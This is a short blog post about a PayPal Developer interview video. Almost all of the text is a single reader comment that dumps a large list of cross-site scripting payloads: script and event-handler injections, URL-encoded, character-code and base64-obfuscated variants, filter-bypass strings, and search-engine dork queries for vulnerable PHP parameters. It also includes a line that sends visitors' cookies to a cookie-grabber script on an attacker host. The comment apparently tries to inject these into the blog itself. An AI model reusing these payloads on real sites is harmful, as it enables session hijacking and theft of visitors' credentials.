sfbeta On Air Interview: Inside the PayPal Developer Network

By

On July 1st, I joined Christian Perry of sfbeta on air to talk about PayPal | Developer and what we are trying to accomplish at the company. We get into why I joined the company, what I think we are trying to change with our efforts, and even go into how to stop world hunger, so there’s plenty of topic diversity for everyone.

Without going into too much detail, here’s our video interview:

3 thoughts on “sfbeta On Air Interview: Inside the PayPal Developer Network

  1. Narendra Bhati

    “>Pwned+by+Max+Govanni
    “>
    “>
    ?debugMode=1&dataURL=’>Click Me For XSS
    %22%3Cmarquee%3E%3Cimg%20src=k%20onerror=alert(%22PWNED%22)%20/
    %3E

    ‘>Click Me For XSS

    <B alert(1)>

    <B="alert(1)”>

    alert(1)

    alert(1)”(EOF)

    : alert(1)”>

    ({0:#0= alert /#0#/#0#(1)});

    2) (1.. __proto__ . e0 = alert )(1. e0 );

    3) a=a setter = alert ;

    4) _ =[[ $ ,__ ,,$$ ,,_$ ,$_ , _$_ ,,, $_$ ]=! ‘ ‘+[!{}]+

    inurl:”.php?cmd=”
    inurl:”.php?z=”

    inurl:”.php?q=”
    inurl:”.php?search=”
    inurl:”.php?query=”
    inurl:”.php?searchstring=”
    inurl:”.php?keyword=”
    inurl:”.php?file=”
    inurl:”.php?years=”
    inurl:”.php?txt=”
    inurl:”.php?tag=”
    inurl:”.php?max=”
    inurl:”.php?from=”
    inurl:”.php?author=”
    inurl:”.php?pass=”
    inurl:”.php?feedback=”
    inurl:”.php?mail=”
    inurl:”.php?cat=”
    inurl:”.php?vote=”
    inurl:search.php?q=
    inurl:com_feedpostold/feedpost.php?url=
    inurl:scrapbook.php?id=
    inurl:headersearch.php?sid=
    inurl:/poll/default.asp?catid=
    inurl:/search_results.php?search=

    PHNjcmlwdD5hbGVydCgnWFNTZWQgQnkgSW5qZWN0T3IgYW5kIEFwM3gnKTwvc2NyaXB0Pg%3D%3D
    Some Attack html & java Strings:
    ==========================
    XSSed By Bluff Master Hacker
    alert(“Hacked”)

    XSSed%20By%20%20lonelyr%20Hacker

    URL Encoded Strings using character codes to Bypass
    ==========================

    Some Java Disaster Strings
    ==========================
    nd_mode=”meteor”;nd_dest=”massive”;nd_control=”on”;nd_vAlign=”bottom”;nd_hAlign=”right”;nd_vMargin=”10″;nd_hMargin=”10″;nd_target=”_top”;

    nd_mode=”cow”;nd_vAlign=”bottom”;nd_hAlign=”right”;nd_vMargin=”10<s”;nd_hMargin=”10?;nd_target=”_top”;

    %3Cscript%20language=%94javascript%94%20src=%94http://www.netdisaster.com/js/mynd.js%94%3E%3C/script%3E

    Any of your Image link
    ==========================

    http://go4webapps.com/wp-content/uploads…utton1.jpg

    <IMG SRC=”javascript:alert(1);”>

    onmouseover=alert(1);

    ¼script¾alert(¢XSS¢)¼/script¾

    BODY{background:url(“javascript:alert(‘XSS’)”)}
    %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3eJavascript
    .XSS{background-image:url(“javascript:alert(‘XSS’)”);}
    alert(‘XSS’);
    data:text/html,test
    exp/*
    <META HTTP-EQUIV="Link" Content="; REL=stylesheet”>
    data:text/html;base64,dGVzdA==
    document.write(atob(/dGVzdA==/.source));
    document.write(/test/.source);
    document.write(String.fromCharCode(116,101,115,116,11));
    document.write(“x74x65x73x74x0A”);
    <LINK REL=”stylesheet” HREF=”http://ha.ckers.org/xss.css”>

    <DIV STYLE="background-image:07507206C028'06a06107606107306307206907007403a06106c065072074028.1027058.1053053027029'029"
    string.fromCharCode(60, 115, 99, 114, 105, 112, 116, 32, 116, 121, 112, 101, 61, 118, 98, 115, 99, 114, 105, 112, 116, 62, 77, 115, 103, 66, 111, 120, 40, 48, 41, 60, 47, 115, 99, 114, 105, 112, 116, 62, 13, 10, 13, 10, 39, 39, 59, 33, 45, 45, 34, 60, 88, 83, 83, 62, 61, 38, 123, 40, 41, 125, 13, 10, 13, 10, 39, 62, 47, 47, 92, 92, 44, 60, 39, 62, 34, 62, 34, 62, 34, 42, 34, 13, 10)
    %3C%73%63%72%69%70%74%20%74%79%70%65%3D%76%62%73%63%72%69%70%74%3E%4D%73%67%42%6F%78%28%30%29%3C%2F%73%63%72%69%70%74%3E%0D%0A%0D%0A%27%27%3B%21%2D%2D%22%3C%58%53%53%3E%3D%26%7B%28%29%7D%0D%0A%0D%0A%27%3E%2F%2F%5C%5C%2C%3C%27%3E%22%3E%22%3E%22%2A%22%0D%0A

    <script type=vbscript>MsgBox(0)</script> '';!--"<XSS>=&{()} '>//\\,<'>">">"*"

    &#60&#115&#99&#114&#105&#112&#116&#32&#116&#121&#112&#101&#61&#118&#98&#115&#99&#114&#105&#112&#116&#62&#77&#115&#103&#66&#111&#120&#40&#48&#41&#60&#47&#115&#99&#114&#105&#112&#116&#62&#13&#10&#13&#10&#39&#39&#59&#33&#45&#45&#34&#60&#88&#83&#83&#62&#61&#38&#123&#40&#41&#125&#13&#10&#13&#10&#39&#62&#47&#47&#92&#92&#44&#60&#39&#62&#34&#62&#34&#62&#34&#42&#34&#13&#10

    a=”get”;
    b=”URL(“”;
    c=”javascript:”;
    d=”alert(‘XSS’);”)”;
    eval(a+b+c+d)
    PHNjcmlwdCB0eXBlPXZic2NyaXB0Pk1zZ0JveCgwKTwvc2NyaXB0Pg0KDQonJzshLS0iPFhTUz49JnsoKX0NCg0KJz4vL1xcLDwnPiI+Ij4iKiINCg==

    <IMG SRC="javascript:alert(‘XSS’)”>

    Code:
    MsgBox(0)

    <t:set attributeName="innerHTML" to="XSSalert(“XSS”)”>

    ”;!–“=’>//,”>”>”*”

    ‘); alert(‘XSS

    alert(1);

    alert(‘XSS’);

    alert(“XSS”)”>
    alert%28String.fromCharCode(84%2C72%2C73%2C83%2C32%2C83%2C73%2C84%2C?69%2C32%2C73%2C83%2C32%2C72%2C65%2C67%2C75%2C69%2C68%2C32%2C66%2C89%2C32%2C66%2C?76%2C85%2C70%2C70%2C32%2C77%2C65%2C83%2C84%2C69%2C82%2C32%2C72%2C65%2C67%2C75%2C?69%2C82%29%29;%2C89%2C32%2C66%2C?76%2C85%2C70%2C70%2C32%2C77%2C65%2C83%2C84%2C69%2C82%2C32%2C72%2C65%2C67%2C75%2C?69%2C82%29%29;

    %3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%2

    prompt(0)

    data:application/msword;base64,0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAPgADAP7

    /…………

    document.write(“x74x65x73x74x0A”);

    %3CIMG+DYNSRC%3D%5C%22javascript%3Aalert%28%27XSS%27%29%5C%22%3E++%3Cfont+style%3D%27color%3Aexpression%28alert%28document.cookie%29%29%27%3E++%3Cimg+src%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E++%3Cscript+language%3D%22JavaScript%22%3Ealert%28%27XSS%27%29%3C%2Fscript%3E++%3Cbody+onunload%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E++%3Cbody+onLoad%3D%22alert%28%27XSS%27%29%3B%22++%5Bcolor%3Dred%27+onmouseover%3D%22alert%28%27xss%27%29%22%5Dmouse+over%5B%2Fcolor%5D++%22%2F%3E%3C%2Fa%3E%3C%2F%3E%3Cimg+src%3D1.gif+onerror%3Dalert%281%29%3E++window.alert%28%22Bonjour+%21%22%29%3B++%3Cdiv+style%3D%22x%3Aexpression%28%28window.r%3D%3D1%29%3F%27%27%3Aeval%28%27r%3D1%3B++alert%28String.fromCharCode%2888%2C83%2C83%29%29%3B%27%29%29%22%3E++%3Ciframe%3C%3Fphp+echo+chr%2811%29%3F%3E+onload%3Dalert%28%27XSS%27%29%3E%3C%2Fiframe%3E++%22%3E%3Cscript+alert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E++%27%3E%3E%3Cmarquee%3E%3Ch1%3EXSS%3C%2Fh1%3E%3C%2Fmarquee%3E++%27%22%3E%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E++%27%22%3E%3E%3Cmarquee%3E%3Ch1%3EXSS%3C%2Fh1%3E%3C%2Fmarquee%3E++%3CMETA+HTTP-EQUIV%3D%5C%22refresh%5C%22+CONTENT%3D%5C%220%3Burl%3Djavascript%3Aalert%28%27XSS%27%29%3B%5C%22%3E++%3CMETA+HTTP-EQUIV%3D%5C%22refresh%5C%22+CONTENT%3D%5C%220%3B+URL%3Dhttp%3A%2F%2F%3BURL%3Djavascript%3Aalert%28%27XSS%27%29%3B%5C%22%3E++%3Cscript%3Evar+var+%3D+1%3B+alert%28var%29%3C%2Fscript%3E++%3CSTYLE+type%3D%22text%2Fcss%22%3EBODY%7Bbackground%3Aurl%28%22javascript%3Aalert%28%27XSS%27%29%22%29%7D%3C%2FSTYLE%3E++%3C%3F%3D%27%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%3F%3E++%3CIMG+SRC%3D%27vbscript%3Amsgbox%28%5C%22XSS%5C%22%29%27%3E++%22+onfocus%3Dalert%28document.domain%29+%22%3E+%3C%22++%3CFRAMESET%3E%3CFRAME+SRC%3D%5C%22javascript%3Aalert%28%27XSS%27%29%3B%5C%22%3E%3C%2FFRAMESET%3E++%3CSTYLE%3Eli+%7Blist-style-image%3A+url%28%5C%22javascript%3Aalert%28%27XSS%27%29%5C%22%29%3B%7D%3C%2FSTYLE%3E%3CUL%3E%3CLI%3EXSS++perl+-e+%27print+%5C%22%3CSCR%5C0IPT%3Ealert%28%5C%22XSS%5C%22%29%3C%2FSCR%5C0IPT%3E%5C%22%3B%27+%3E+out++perl+-e+%27print+%5C%22%3CIMG+SRC%3Djava%5C0script%3Aalert%28%5C%22XSS%5C%22%29%3E%5C%22%3B%27+%3E+out++%3Cbr+size%3D%5C%22%26%7Balert%28%27XSS%27%29%7D%5C%22%3E++%3Cscrscriptipt%3Ealert%281%29%3C%2Fscrscriptipt%3E++%3C%2Fbr+style%3Da%3Aexpression%28alert%28%29%29%3E++%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E++%22%3E%3CBODY+onload%21%23%24%25%26%28%29*%7E%2B-_.%2C%3A%3B%3F%40%5B%2F%7C%5C%5D%5E%60%3Dalert%28%22XSS%22%29%3E++%5Bcolor%3Dred+width%3Dexpression%28alert%28123%29%29%5D%5Bcolor%5D++%3CBASE+HREF%3D%22javascript%3Aalert%28%27XSS%27%29%3B%2F%2F%22%3E++Execute%28MsgBox%28chr%2888%29%26chr%2883%29%26chr%2883%29%29%29%3C++%22%3E%3C%2Fiframe%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E++%3Cbody+onLoad%3D%22while%28true%29+alert%28%27XSS%27%29%3B%22%3E++%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281111%29%3C%2Fscript%3E++%3C%2Ftextarea%3E%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E++%27%22%22%3E%3Cscript+language%3D%22JavaScript%22%3E+alert%28%27X+%5CnS+%5CnS%27%29%3B%3C%2Fscript%3E++%3C%2Fscript%3E%3C%2Fscript%3E%3C%3C%3C%3Cscript%3E%3C%3E%3E%3E%3E%3C%3C%3Cscript%3Ealert%28123%29%3C%2Fscript%3E++%3Chtml%3E%3Cnoalert%3E%3Cnoscript%3E%28123%29%3C%2Fnoscript%3E%3Cscript%3E%28123%29%3C%2Fscript%3E++%3CINPUT+TYPE%3D%22IMAGE%22+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E++%27%3E%3C%2Fselect%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E++%27%3E%22%3E%3Cscript+src+%3D+%27http%3A%2F%2Fwww.site.com%2FXSS.js%27%3E%3C%2Fscript%3E++%7D%3C%2Fstyle%3E%3Cscript%3Ea%3Deval%3Bb%3Dalert%3Ba%28b%28%2FXSS%2F.source%29%29%3B%3C%2Fscript%3E++%3CSCRIPT%3Edocument.write%28%22XSS%22%29%3B%3C%2FSCRIPT%3E++a%3D%22get%22%3Bb%3D%22URL%22%3Bc%3D%22javascript%3A%22%3Bd%3D%22alert%28%27xss%27%29%3B%22%3Beval%28a%2Bb%2Bc%2Bd%29%3B++%3D%27%3E%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E++%3Cscript%2Bsrc%3D%22%3E%22%2Bsrc%3D%22http%3A%2F%2Fyoursite.com%2Fxss.js%3F69%252C69%22%3E%3C%2Fscript%3E++%3Cbody+background%3Djavascript%3A%27%22%3E%3Cscript%3Ealert%28navigator.userAgent%29%3C%2Fscript%3E%3E%3C%2Fbody%3E++%22%3E%2FXaDoS%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cscript+src%3D%22http%3A%2F%2Fwww.site.com%2FXSS.js%22%3E%3C%2Fscript%3E++%22%3E%2FKinG-InFeT.NeT%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E++src%3D%22http%3A%2F%2Fwww.site.com%2FXSS.js%22%3E%3C%2Fscript%3E++data%3Atext%2Fhtml%3Bcharset%3Dutf-7%3Bbase64%2CIj48L3RpdGxlPjxzY3JpcHQ%2BYWxlcnQoMTMzNyk8L3NjcmlwdD4%3D++%21–%22+%2F%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E++%3Cscript%3Ealert%28%22XSS+by+%5Cnxss%22%29%3C%2Fscript%3E%3Cmarquee%3E%3Ch1%3EXSS+by+xss%3C%2Fh1%3E%3C%2Fmarquee%3E++%22%3E%3Cscript%3Ealert%28%22XSS+by+%5Cnxss%22%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+xss%3C%2Fh1%3E%3C%2Fmarquee%3E++%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%28%22XSS+by+%5Cnxss%22%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+xss%3C%2Fh1%3E%3C%2Fmarquee%3E++%3Cimg+%22%22%22%3E%3Cscript%3Ealert%28%22XSS+by+%5Cnxss%22%29%3C%2Fscript%3E%3Cmarquee%3E%3Ch1%3EXSS+by+xss%3C%2Fh1%3E%3C%2Fmarquee%3E++%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3Cmarquee%3E%3Ch1%3EXSS+by+xss%3C%2Fh1%3E%3C%2Fmarquee%3E++%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%22XSS+by+%5Cnxss%3C%2Fh1%3E%3C%2Fmarquee%3E++%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+xss%3C%2Fh1%3E%3C%2Fmarquee%3E++%3Ciframe+src%3D%22javascript%3Aalert%28%27XSS+by+%5Cnxss%27%29%3B%22%3E%3C%2Fiframe%3E%3Cmarquee%3E%3Ch1%3EXSS+by+xss%3C%2Fh1%3E%3C%2Fmarquee%3E

    location.href=”http://www.evilsite.org/cookiegrabber.php?cookie”+escape(document.cookie)

    <script>alert(‘XSS’);</script>

    alert(String.fromCharCode(88,83,83))

    @import’javascript:alert(“XSS”)’;

    <? echo('alert(“XSS”)’); ?>

    alert(‘XSS’)

    “>alert(0)

    alert(/xss/)

    alert(/xss/)

    alert(‘XSS’)

    window.alert(“Bonjour !”);

    <iframe onload=alert(‘XSS’)>

    “><script alert(String.fromCharCode(88,83,83))

    ‘>>XSS

    ‘”>>alert(‘XSS’)

    ‘”>>XSS

    var var = 1; alert(var)

    BODY{background:url(“javascript:alert(‘XSS’)”)}

    <?='alert(“XSS”)’?>

    ” onfocus=alert(document.domain) “> <"

    li {list-style-image: url(“javascript:alert(‘XSS’)”);}XSS

    perl -e ‘print “alert(“XSS”)”;’ > out

    perl -e ‘print “”;’ > out

    alert(1)

    alert(1)

    “>

    [color=red width=expression(alert(123))][color]

    Execute(MsgBox(chr(88)&chr(83)&chr(83)))alert(123)

    ‘”>alert(1111)

    ‘”>alert(document.cookie)

    ‘””> alert(‘X nS nS’);

    <<<>>><<alert(123)

    (123)(123)

    ‘>alert(123)

    ‘>”>

    }a=eval;b=alert;a(b(/XSS/.source));

    document.write(“XSS”);

    a=”get”;b=”URL”;c=”javascript:”;d=”alert(‘xss’);”;eval(a+b+c+d);

    =’>alert(“xss”)

    “+src=”http://yoursite.com/xss.js?69%2C69”>

    alert(navigator.userAgent)>

    “>/XaDoS/>alert(document.cookie)

    “>/KinG-InFeT.NeT/>alert(document.cookie)

    src=”http://www.site.com/XSS.js”>

    data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=

    !–” />alert(‘xss’);

    alert(“XSS by bhati”)XSS by bhati

    “>alert(“XSS by nxss”)>XSS by bhati

    ‘”>alert(“XSS by nbhati”)>XSS by xss

    alert(“XSS by nxss”)XSS by bhati

    alert(1337)XSS by xss

    “>alert(1337)”>alert(“XSS by nxss

    ‘”>alert(1337)>XSS by xss

    XSS by xss

Comments are closed.